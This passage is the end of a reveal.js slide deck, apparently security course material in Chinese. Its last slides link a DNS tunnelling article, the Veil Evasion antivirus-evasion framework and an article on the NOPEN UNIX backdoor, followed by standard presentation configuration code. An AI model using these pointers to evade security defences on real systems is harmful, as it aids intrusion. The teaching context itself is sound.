<p><a href="http://www.freebuf.com/sectool/112076.html">DNS Tunnel</a></p>

            </section>
    



    
        <section >
            
            <h2>5 恶意代码免杀技术</h2>
<p><a href="https://www.veil-framework.com/">Veil Evasion</a></p>

            </section>
    



    
        <section >
            
            <h2>6 参考</h2>
<p><a href="http://www.freebuf.com/articles/system/114607.html">UNIX后门NOPEN</a></p>

            </section>
    


    </div>


  </div>

  	
	<script src="libs/reveal.js/4.1.3/reveal.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/zoom/zoom.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/notes/notes.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/search/search.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/markdown/markdown.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/highlight/highlight.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/menu/menu.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/math/math.js"></script>

	<script src="libs/reveal.js/4.1.3/plugin/fullscreen/plugin.js"></script>
  
  	<script src="libs/reveal.js/4.1.3/plugin/animate/plugin.js"></script>
  	<script src="libs/reveal.js/4.1.3/plugin/animate/svg.min.js"></script>
  
  	<script src="libs/reveal.js/4.1.3/plugin/anything/plugin.js"></script>
	  <script src="libs/reveal.js/4.1.3/plugin/anything/Chart.min.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/anything/d3/d3.v3.min.js"></script>				
	<script src="libs/reveal.js/4.1.3/plugin/anything/d3.patch.js"></script>			
	<script src="libs/reveal.js/4.1.3/plugin/anything/d3/queue.v1.min.js"></script>		
	<script src="libs/reveal.js/4.1.3/plugin/anything/d3/topojson.v1.min.js"></script>		
	<script src="libs/reveal.js/4.1.3/plugin/anything/function-plot.js"></script>

 <!--	<script src="libs/reveal.js/4.1.3/plugin/audio-slideshow/plugin.js"></script>  -->
<!--	<script src="libs/reveal.js/4.1.3/plugin/audio-slideshow/recorder.js"></script>-->
<!--	<script src="libs/reveal.js/4.1.3/plugin/audio-slideshow/RecordRTC.js"></script>-->

<script src="libs/reveal.js/4.1.3/plugin/chalkboard/plugin.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/customcontrols/plugin.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/embed-tweet/plugin.js"></script>

	<script src="libs/reveal.js/4.1.3/plugin/chart/chart.min.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/chart/plugin.js"></script>

  <script>

		const printPlugins = [
			RevealNotes, 
			RevealHighlight,
			RevealMath,
			RevealAnimate,
			RevealChalkboard, 
			RevealEmbedTweet,
			RevealChart,
		];

		const plugins =  [...printPlugins,
		RevealZoom, 
		RevealSearch, 
				RevealMarkdown, 
				RevealMenu, 
				RevealFullscreen,
				RevealAnything,
				//RevealAudioSlideshow,
				//RevealAudioRecorder,
				RevealCustomControls, 
				// poll
				// question
				// seminar
				 ]


		// Also available as an ES module, see:
		// https://revealjs.com/initialization/
		Reveal.initialize({
			controls: true,
			controlsTutorial: true,
			controlsLayout: 'bottom-right',
			controlsBackArrows: 'faded',
			progress: true,
			slideNumber: false,
			//#showSlideNumber "all" "print" "speaker"
			hash: true,//#  hash: false,
			//# respondToHashChanges: true,
			//# history: false,
			keyboard: true,
			//#keyboardCondition: null,
			overview: true,
			center: true,
			touch: true,
			loop: false,
			rtl: false,
			//#navigationMode: 'default', linear grid
			shuffle: false,
			fragments: true,
			fragmentInURL: false,
			embedded: false,
			help: true,
			//#pause: true
			showNotes: false,
			autoPlayMedia: false, // TODO fix this to a nullable value
			//#preloadIframes: null. true false
			//#autoAnimate: true
			//#autoAnimateMatcher: null,
			//#autoAnimateEasing: 'ease',
			//autoAnimateDuration: 1.0,
			//#autoAnimateUnmatched: true
			//#autoAnimateStyles: []
			autoSlide: 0, // TODO fix this to a falseable value
			autoSlideStoppable: true,
			autoSlideMethod: '0',
			defaultTiming: 120,
			mouseWheel: false,
			//#previewLinks: false
			//#postMessage: true,  // TODO : this can cause issues with the vscode api ???
			//#postMessageEvents: false,
			//#focusBodyOnPageVisibilityChange: true,
			transition: 'slide',
			transitionSpeed: 'default',
			backgroundTransition: 'fade',
			//#pdfMaxPagesPerSlide: Number.POSITIVE_INFINITY,
			//#pdfSeparateFragments: true,
			//#pdfPageHeightOffset: -1,
			viewDistance: 3,
			//#mobileViewDistance: 2,
			display: 'block',
			//#hideInactiveCursor: true,
			//#hideCursorTime: 5000

			// Parallax Background
			parallaxBackgroundImage: '',
			parallaxBackgroundSize: '',
			parallaxBackgroundHorizontal: 0,
			parallaxBackgroundVertical: 0,
			
			//Presentation Size
			width: 960,
			height: 700,
			margin: 0.04,
			minScale: 0.2,
			maxScale: 2,
			disableLayout: false,

			audio: {
				prefix: 'audio/', 	// audio files are stored in the "audio" folder
				suffix: '.ogg',		// audio files have the ".ogg" ending
				textToSpeechURL: null,  // the URL to the text to speech converter
				defaultNotes: false, 	// use slide notes as default for the text to speech converter
				defaultText: false, 	// use slide text as default for the text to speech converter
				advance: 0, 		// advance to next slide after given time in milliseconds after audio has played, use negative value to not advance
				autoplay: false,	// automatically start slideshow
				defaultDuration: 5,	// default duration in seconds if no audio is available
				defaultAudios: true,	// try to play audios with names such as audio/1.2.ogg
				playerOpacity: 0.05,	// opacity value of audio player if unfocused
				playerStyle: 'position: fixed; bottom: 4px; left: 25%; width: 50%; height:75px; z-index: 33;', // style used for container of audio controls
				startAtFragment: false, // when moving to a slide, start at the current fragment or at the start of the slide
			},
			
			chalkboard: { // font-awesome.min.css must be available
					//src: "chalkboard/chalkboard.json",
					storage: "chalkboard-demo",
				},
			
			customcontrols: {
					controls: [
      						{
						  id: 'toggle-overview',
						  title: 'Toggle overview (O)',
						  icon: '<i class="fa fa-th"></i>',
						  action: 'Reveal.toggleOverview();'
						}
						,
						{ icon: '<i class="fa fa-pen-square"></i>',
						  title: 'Toggle chalkboard (B)',
						  action: 'RevealChalkboard.toggleChalkboard();'
						},
						{ icon: '<i class="fa fa-pen"></i>',
						  title: 'Toggle notes canvas (C)',
						  action: 'RevealChalkboard.toggleNotesCanvas();'
						}
				]
			},
			chart: {
					defaults: { 
						color: 'lightgray', // color of labels
						scale: { 
							beginAtZero: true, 
							ticks: { stepSize: 1 },
							grid: { color: "lightgray" } , // color of grid lines
						},
					},
					line: { borderColor: [ "rgba(20,220,220,.8)" , "rgba(220,120,120,.8)", "rgba(20,120,220,.8)" ], "borderDash": [ [5,10], [0,0] ] }, 
					bar: { backgroundColor: [ "rgba(20,220,220,.8)" , "rgba(220,120,120,.8)", "rgba(20,120,220,.8)" ]}, 
					pie: { backgroundColor: [ ["rgba(0,0,0,.8)" , "rgba(220,20,20,.8)", "rgba(20,220,20,.8)", "rgba(220,220,20,.8)", "rgba(20,20,220,.8)"] ]},
					radar: { borderColor: [ "rgba(20,220,220,.8)" , "rgba(220,120,120,.8)", "rgba(20,120,220,.8)" ]}, 
			},
			math: {
				mathjax: 'https://cdn.jsdelivr.net/gh/mathjax/mathjax@2.7.8/MathJax.js',
				config: 'TeX-AMS_HTML-full',
				// pass other options into `MathJax.Hub.Config()`
				TeX: { Macros: { RR: "{\\bf R}" } }
				},
				anything: [ 
				{
		className: "plot",
		defaults: {width:500, height: 500, grid:true},
		initialize: (function(container, options){ options.target = "#"+container.id; functionPlot(options) })
	 },
	 {
		className: "chart",  
		initialize: (function(container, options){ container.chart = new Chart(container.getContext("2d"), options);  })
	 },
	 {
		className: "anything",
		initialize: (function(container, options){ if (options && options.initialize) { options.initialize(container)} })
	 },
					],
			// Learn about plugins: https://revealjs.com/plugins/
			plugins: (window.location.search.match(/print-pdf/gi) ? printPlugins : plugins ) 
		});
			


	    // Change chalkboard theme : 
		function changeTheme(input) {
			var config = {};
			config.theme = input.value;
			Reveal.getPlugin("RevealChalkboard").configure(config);
			input.blur();
		}

		// // Handle the message inside the webview
        // window.addEventListener('message', event => {

        //     const message = event.data; // The JSON data our extension sent

        //     switch (message.command) {
        //         case 'refactor':
        //             Reveal.toggleHelp();
        //     }
        // });

		if (window.location.search.match(/print-pdf-now/gi)) {
      		setTimeout(() => {
				window.print();
			  }, 2500);
			
    }
		

	</script>

</body>

</html>